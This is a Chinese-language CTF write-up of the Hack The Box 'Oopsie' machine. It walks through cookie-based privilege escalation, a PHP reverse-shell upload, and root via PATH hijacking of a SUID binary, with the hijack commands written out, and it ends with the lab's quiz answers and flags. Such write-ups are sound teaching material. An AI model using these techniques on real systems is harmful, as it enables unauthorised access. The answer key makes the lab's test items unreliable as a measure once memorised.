首页 > 其他分享 >HTB-Oopsie(越权漏洞,suid提权,js接口查询插件)

HTB-Oopsie(越权漏洞,suid提权,js接口查询插件)

时间:2024-09-11 19:51:14浏览次数:15  
标签:__ 文件 插件 suid GLIBC cat 提权 2.2 start

前言

  • 各位师傅大家好,我是qmx_07,今天给大家讲解Oopsie靶机
    在这里插入图片描述

渗透过程

信息搜集

在这里插入图片描述
在这里插入图片描述

  • 服务器开放了22SSH端口 和 HTTP80端口

FindSomething插件

  • 介绍:帮助寻找网站的js接口,辅助渗透

在这里插入图片描述

  • 通过js接口查找,发现目录/cdn-cgi/login 登录接口
    在这里插入图片描述
  • 通过游客模式登录

越权登录 访问uploads 文件上传模块

在这里插入图片描述

  • 账户页面记录了 Access ID 和用户姓名
    在这里插入图片描述
  • 数据包通过user 验证Access ID 和 role 验证 用户名
  • 猜测可以通过修改 进行越权操作
    在这里插入图片描述
  • 遍历id 内容,发现admin的相关信息,尝试访问 上传文件模块
    在这里插入图片描述

在这里插入图片描述

  • 通过Access ID 越权 修改用户名,访问到uploads页面,后续尝试上传文件漏洞

上传木马文件,连接会话

准备工作:

  • kali提供了一份shell连接文件,存放在:/usr/share/webshells/php/php-reverse-shell.php
    在这里插入图片描述
  • 修改ip 端口 为本地服务器
    在这里插入图片描述
  • 修改为admin管理权的权限,上传shell.php文件
    在这里插入图片描述
  • 需要升级成交互式会话
SHELL=/bin/bash script -q /dev/null
  • SHELL是环境变量,它的值代表系统执行shell的文件位置
  • script 运行新shell
  • -q 安静运行
  • /dev/nulll不保存记录的终端会话内容
    在这里插入图片描述
    在这里插入图片描述
    用户flag:f2c74ee8db7983851ab2a96a44eb7981

权限提升

在这里插入图片描述

  • 网站目录中 数据库配置文件,尝试切换账户
    在这里插入图片描述
  • 通过id查询,发现rebert用户属于bugtracker用户组
    在这里插入图片描述
find / -type f -group bugtrackert 2>/dev/null
  • 查找bugtrackert用户组 文件
    在这里插入图片描述
  • 发现bugtracker 用户组 具有 s权限
  • s权限代表其他用户在执行该文件时会以该文件的所有者的身份执行
  • 在这边是root用户管理者身份

通过strings 命令,查看文件内容:

strings /usr/bin/bugtracker
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
strcpy
__isoc99_scanf
__stack_chk_fail
putchar
printf
strlen
malloc
strcat
system
geteuid
__cxa_finalize
__libc_start_main
GLIBC_2.7
GLIBC_2.4
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
AWAVI
AUATL
[]A\A]A^A_
------------------
: EV Bug Tracker :
------------------
Provide Bug ID: 
---------------
cat /root/reports/
;*3$"
GCC: (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7697
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
test.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
putchar@@GLIBC_2.2.5
_ITM_deregisterTMCloneTable
strcpy@@GLIBC_2.2.5
_edata
strlen@@GLIBC_2.2.5
__stack_chk_fail@@GLIBC_2.4
system@@GLIBC_2.2.5
printf@@GLIBC_2.2.5
concat
geteuid@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
malloc@@GLIBC_2.2.5
__bss_start
main
__isoc99_scanf@@GLIBC_2.7
strcat@@GLIBC_2.2.5
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment

  • cat /root/reports/ ,可以观察到该文件访问了root路径内容,该文件又是suid权限
  • 同时cat命令不是绝对路径写入
  • 系统会向环境变量中 寻找cat命令,如果找到则停止,所以我们在环境目录添加一个恶意的cat命令,造成权限提升
cd /tmp/
echo '/bin/sh' > cat 
chmod +x cat
export PATH=/tmp:$PATH 
  • export PATH=/tmp:$PATH 代表命令从/tmp目录寻找
    在这里插入图片描述
  • 执行bugtracker文件,提权成功
    在这里插入图片描述
  • flag:af13b0bee69f8a877c3faf667f7beacf

答案

  • 1.什么工具可以拦截流量?

proxy

  • 2.web服务器的登录路径是?

/cdn-cgi/login

  • 3.可以修改那些内容 可以上传文件?

cookie

  • 4.admin用户的Access ID是什么?

34322

  • 5.上传文件时,存放在服务器哪个位置?

/uploads

  • 6.存放robret用户的账户密码凭据在哪个文件?

db.php

  • 7.使用什么命令来查询组bugtracker拥有的文件?

find

  • 8.无论哪个用户运行bugtracker ,都是什么权限?

root

  • 9.suid代表什么?

Set Owner User ID

  • 10.文件里不安全的命令是什么?

cat

  • 11.用户flag是什么?

f2c74ee8db7983851ab2a96a44eb7981

  • 12.最终flag是什么?

af13b0bee69f8a877c3faf667f7beacf

总结

  • 今天我们介绍了越权漏洞 和 suid提权,findSometing js接口插件

标签:__,文件,插件,suid,GLIBC,cat,提权,2.2,start
From: https://blog.csdn.net/weixin_58038441/article/details/142142555

相关文章

  • 如何在Java中实现应用的动态扩展:基于热插拔与插件机制的实现
    如何在Java中实现应用的动态扩展:基于热插拔与插件机制的实现大家好,我是微赚淘客返利系统3.0的小编,是个冬天不穿秋裤,天冷也要风度的程序猿!在现代应用开发中,为了应对不断变化的需求和快速迭代的要求,应用的动态扩展能力变得尤为重要。实现动态扩展的关键技术包括热插拔和插件机制。......
  • Wordpress 知名插件漏洞致百万网站面临接管风险
        流行的 WordPressLiteSpeedCache 插件中存在一个漏洞,可能允许攻击者检索用户cookie并可能接管网站。    该问题被跟踪为CVE-2024-44000,之所以存在,是因为该插件在用户登录请求后会在调试日志文件中包含set-cookie的HTTP响应标头。    ......
  • HtmlWebpackPlugin插件和HtmlWebpackInlineSourcePlugin插件的使用
    一、HtmlWebpackPlugin1.作用自动创建HTML自动创建HTML:在构建过程中自动生成一个HTML5文件,该文件可以包含所有webpack打包过程中生成的bundles。这意味着你不需要手动创建HTML文件,插件会为你处理这一切。自动注入资源:自动将打包生成的JavaScript、CSS等文件注入到生成的HTML文......
  • ob插件-TP模板-配置CMD
    1.简介EnableUserSystemCommandFunctions:打开此功能Shellbinarylocation:输入C:\\Windows\\System32\\cmd.exe添加脚本:脚本名称,脚本代码调用脚本:<%tp.user.脚本名称()%>2.更新3.pyt1"E:/ProgramFiles/Python310/python.exe""E:\Clouds\BaiduSyncdisk......
  • 在IDEA中安装Scala插件
    先打开IDEA[文件]右键,[设置] 点击[插件],输入Scala并搜索,点击[安装]安装完成后点击[重启IDE]  重启后,[文件]右键,[新建],[项目] 点击[创建]点击[此窗口]或[新窗口]  [文件]右键,点击[项目结构]点击[全局库],点击[+]号  选择[ScalaSDK] 选择第一个,点击[......
  • 17个Mybatis Plugs注解:Mybatis Plugs插件架构设计与注解案例(必须收藏)
    MyBatisPlugins框架提供了一种强大而灵活的机制,允许开发者通过实现Interceptor接口来扩展MyBatis的核心功能。这种插件化的方法无需修改MyBatis源码,即可引入诸如性能监控、日志记录、数据加密、查询缓存等额外功能。通过注解如@Intercepts、@Signature等,开发者可以精确地......
  • Wordpress采集发布插件-免费下载
    推荐一款可以自动采集文章数据,并发布到Wordpress网站的Wordpress采集发布插件,支持对接简数采集器,火车头采集器,八爪鱼采集器,后羿采集器等大多数网页文章数据采集软件。Wordpress采集发布插件使用方法如下:1. 下载并安装Wordpress采集发布插件1.1 Wordpress采集发布插件免费下载......
  • jQuery中使用插件
    <!DOCTYPEhtml><htmllang="en"><head>  <metacharset="UTF-8">  <metaname="viewport"content="width=device-width,initial-scale=1.0">  <title>Document</title>  ......
  • jQuery中开发插件
    页面代码 <!DOCTYPEhtml><htmllang="en"><head>  <metacharset="UTF-8">  <metaname="viewport"content="width=device-width,initial-scale=1.0">  <title>Document</title&......
  • Unreal 配置插件依赖另一个插件
    例如:插件A依赖插件B1、把两个插件都放到项目Plugins文件夹下2、修改插件A的A.uplugin文件,添加如下片段"Plugins":[{"Name":"B","Enabled":true},...]3、修改插件A跟插件B的加载时间设置打开A.uplugin,设置加载时间为Default"Mo......